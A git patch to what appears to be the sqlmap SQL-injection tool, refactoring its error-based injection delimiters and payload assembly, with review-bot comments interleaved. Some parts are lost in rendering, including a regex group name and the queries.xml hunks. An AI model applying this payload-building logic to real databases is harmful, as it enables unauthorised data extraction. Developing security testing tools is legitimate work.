From e24bff049741d8ae49c3768705fa5baad530f09b Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Wed, 20 Oct 2010 09:46:57 +0000
Subject: [PATCH] nice refactoring
---
 lib/core/settings.py | 8 ++++----
 lib/techniques/error/use.py | 6 +++++-
 xml/queries.xml | 8 ++++----
 3 files changed, 13 insertions(+), 9 deletions(-)
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 071a3bc88..79459cf4a 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -34,10 +34,10 @@ LOGGER.addHandler(LOGGER_HANDLER)
 LOGGER.setLevel(logging.WARN)
 # error based injection
-ERROR_SPACE = "%c%c%c" % (58, 95, 58)
-ERROR_EMPTY_CHAR = "%c%c%c" % (58, 120, 58)
-ERROR_START_CHAR = "%c%c%c" % (58, 115, 58)
-ERROR_END_CHAR = "%c%c%c" % (58, 101, 58)
+ERROR_SPACE = ":_:"
+ERROR_EMPTY_CHAR = ":x:"
+ERROR_START_CHAR = ":s:"
+ERROR_END_CHAR = ":e:"
 # System variables
 IS_WIN = subprocess.mswindows
diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py
index 109258a35..386136ff7 100644
--- a/lib/techniques/error/use.py
+++ b/lib/techniques/error/use.py
@@ -40,6 +40,8 @@ def errorUse(expression, resumeValue=True):
     query = agent.prefixQuery(" %s" % queries[kb.misc.testedDbms].error)
     query = agent.postfixQuery(query)
     payload = agent.payload(newValue=query)
+    startLimiter = ""
+    endLimiter = ""
     if resumeValue:
         output = resume(expression, payload)
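Review bot: ERROR_START_CHAR and ERROR_END_CHAR are interpolated unescaped into a regex pattern in lib/techniques/error/use.py (`re.search('%s(?P.+?)%s' % (ERROR_START_CHAR, ERROR_END_CHAR), ...)`), so the new plain literals only work because ':s:' and ':e:' happen to contain no regex metacharacters. With the %c construction gone, that constraint is now invisible and easy to break on a later edit; a comment above the block such as `# used verbatim inside regex patterns and quoted SQL literals - keep free of regex metacharacters and quotes` would record it, or the use site could wrap the values in re.escape(). ERROR_SPACE and ERROR_EMPTY_CHAR are not referenced elsewhere in this patch, so I cannot tell from here whether the same applies to them.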
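Review bot: startLimiter and endLimiter are initialised to empty strings here, and the second hunk reassigns them only inside the branch that builds nulledCastedField; on its else path they remain empty while the later re.search still requires ERROR_START_CHAR and ERROR_END_CHAR around the captured value. Unless the expression or the error query template already supplies those markers on that path, the match can never succeed there, and a failed lookup would be indistinguishable from a genuine miss. If the empty defaults are deliberate for the else path, a comment on these two lines, e.g. `# limiters are injected only for the casted-field case; the else path relies on the template`, would make that explicit; otherwise the unescaped limiters should be built once before the if/else. errorUse starts at the hunk header and its body continues outside both hunks, so the condition that selects the branch is not visible to me.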
@@ -56,13 +58,15 @@ def errorUse(expression, resumeValue=True):
         nulledCastedField = nulledCastedField.replace("CHAR(10000)", "CHAR(255)") #fix for that 'Subquery returns more than 1 row'
         expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1)
         expressionUnescaped = unescaper.unescape(expressionReplaced)
+        startLimiter = unescaper.unescape("'%s'" % ERROR_START_CHAR)
+        endLimiter = unescaper.unescape("'%s'" % ERROR_END_CHAR)
     else:
         expressionUnescaped = unescaper.unescape(expression)
     debugMsg = "query: %s" % expressionUnescaped
     logger.debug(debugMsg)
-    forgedPayload = safeStringFormat(payload, (logic, randInt, expressionUnescaped))
+    forgedPayload = safeStringFormat(payload, (logic, randInt, startLimiter, expressionUnescaped, endLimiter))
     result = Request.queryPage(urlencode(forgedPayload), content=True)
     match = re.search('%s(?P.+?)%s' % (ERROR_START_CHAR, ERROR_END_CHAR), result[0], re.DOTALL | re.IGNORECASE)
diff --git a/xml/queries.xml b/xml/queries.xml
index fca6fd1e1..f4097fd9d 100644
--- a/xml/queries.xml
+++ b/xml/queries.xml
@@ -24,7 +24,7 @@ - +
@@ -91,7 +91,7 @@ - +
@@ -175,7 +175,7 @@ - +
@@ -242,7 +242,7 @@ - +
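Review bot: The forgedPayload call now supplies five values (logic, randInt, startLimiter, expressionUnescaped, endLimiter) instead of three, which couples it to every `error` query template in xml/queries.xml carrying exactly five placeholders in that order; the four queries.xml hunks in this patch are rendered empty on this page, so that cannot be verified here, and a template still carrying three placeholders would produce a malformed query or a surplus argument depending on how safeStringFormat handles the mismatch. A comment beside the call, e.g. `# error template must provide 5 placeholders: logic, randInt, startLimiter, expression, endLimiter`, would make the contract explicit to whoever next edits queries.xml. The `"'%s'"` wrapper also hard-codes single-quote delimiters before unescaper.unescape() runs, which presumably rewrites the literal into a DBMS-specific form; worth confirming that holds for every DBMS with an error template. errorUse continues outside this hunk.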